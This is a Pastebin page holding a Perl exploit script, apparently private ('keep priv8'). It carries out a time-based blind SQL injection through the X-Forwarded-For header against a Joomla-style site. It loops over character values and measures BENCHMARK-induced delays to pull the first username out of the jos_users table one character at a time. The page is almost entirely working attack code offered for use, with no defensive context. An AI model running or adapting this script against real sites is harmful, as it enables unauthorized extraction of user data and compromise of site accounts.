Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl -w
- use Time::HiRes;
- use LWP;
- print 'Vuln found by Tom Landry - keep priv8 :]' . "\n";
- my $url = $ARGV[0];
- my $push = '0';
- my $ascii_char = '47';
- my $master_string = '';
- $push = '1';
- while ("true") {
- $ascii_char = $ascii_char + 1;
- my @headers = ('User-Agent' => 'Mozilla/4.2 [en]',
- 'Accept' => '*/*',
- 'x-forwarded-for' => "lol\" AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT username from jos_users limit 0,1),$push,1)),0)<$ascii_char),BENCHMARK(900000,SHA(1)),1)) -- /*",);
- $start_time = Time::HiRes::time();
- my $agent = LWP::UserAgent->new( );
- $response = $agent->get($url, @headers);
- $end_time = Time::HiRes::time();
- print $response->content."\n";
- my $difference = $end_time - $start_time;
- print $difference."\n";
- if ($difference > 1) {
- $ascii_char = $ascii_char - 1;
- print "LOL WTF ".$ascii_char."\n";
- $master_string .= chr($ascii_char);
- $push = $push + 1;
- $ascii_char = '47';
- }
- print $master_string."\n";
- print $start_time."\n";
- print $end_time."\n";
- sleep(1);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement